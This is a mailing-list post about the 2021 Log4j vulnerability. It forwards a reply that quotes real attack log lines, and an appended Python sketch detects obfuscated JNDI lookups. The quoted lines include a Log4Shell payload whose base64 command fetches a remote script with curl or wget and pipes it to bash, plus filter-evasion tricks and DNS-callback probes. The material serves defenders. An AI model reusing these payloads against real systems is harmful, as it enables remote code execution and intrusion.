For those of you losing sleep over the Java logging exploit, my heart goes out to you.

While I'm glad I, personally, and on the bufferbloat-related websites, haven't got a single thing written in Java, and I lost 3 weeks of my life over Christmas to Spectre, and several weeks per year - and usually, right around Christmas! - coping with other CVEs... this one seems so big and affecting so many other services I use, that I just kind of want to take all my cash out of the bank, and log out, and find a tropic island somewhere.

---------- Forwarded message ---------
From: Jörg Kost <[email protected]>
Date: Mon, Dec 13, 2021 at 3:43 AM
Subject: Re: Log4j mitigation
To: Jean St-Laurent <[email protected]>
Cc: <[email protected]>

You can't see it. The attack vector can hide in HTTP GETs, POSTs (SSL), in headers, in anything related to where a Java process does logging with Log4j; it's innumerable. It might even evaluate from a URI itself; it won't use a fixed port.

It's not wormy right now, but maybe it will be soon.

We have been seeing things like this since the 10th of Dec. And this is only a typical Apache logfile for HTTP/HTTPS, where we do logging:

${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo}

GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80}

GET /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} HTTP/1.1" 200 - "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}

--
I tried to build a better future, a few times:
https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org

Dave Täht CEO, TekLibre, LLC
_______________________________________________
Bloat mailing list
[email protected]
https://lists.bufferbloat.net/listinfo/bloat
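Added example, not part of the original messages: the log lines quoted above hide the "jndi:ldap" token behind percent-encoding, ${lower:x} wrappers and ${::-x} defaults, so a plain substring search misses them. The sketch below normalizes those three forms before matching; the function names and the sample lines (documentation hosts only) are constructed for illustration.

```python
import re
from urllib.parse import unquote

# ${lower:X} and ${upper:X}: case lookups wrapping literal characters.
CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${name:-default}: yields the default when the name is unset, e.g. ${::-j}.
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# A JNDI lookup once the wrappers are gone; group 1 is the scheme.
JNDI = re.compile(r"\$\{jndi:([a-z]+):", re.IGNORECASE)

def _apply_case(match):
    op, text = match.group(1).lower(), match.group(2)
    return text.lower() if op == "lower" else text.upper()

def deobfuscate(line, max_rounds=10):
    """Percent-decode, then collapse nested lookups innermost first."""
    text = unquote(line)
    for _ in range(max_rounds):  # bounded so hostile nesting cannot spin
        reduced = CASE_LOOKUP.sub(_apply_case, text)
        reduced = DEFAULT_LOOKUP.sub(lambda m: m.group(1), reduced)
        if reduced == text:
            break
        text = reduced
    return text

def jndi_schemes(line):
    """Return the sorted JNDI schemes found in one log line."""
    return sorted({m.group(1).lower() for m in JNDI.finditer(deobfuscate(line))})

# Constructed sample lines: same shapes as above, documentation hosts only.
SAMPLES = [
    'GET /$%7Bjndi:dns://192.0.2.1/scan%7D HTTP/1.1" 301 281 "-" "-"',
    'GET / HTTP/1.1" 200 - "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://h.example.invalid}" "-"',
    'GET / HTTP/1.1" 200 - "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.example.invalid}"',
    'GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(jndi_schemes(sample), sample[:60])
```

Only the lookup forms visible in the quoted log lines are handled, so an empty result is a triage signal and not proof that a line is clean.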
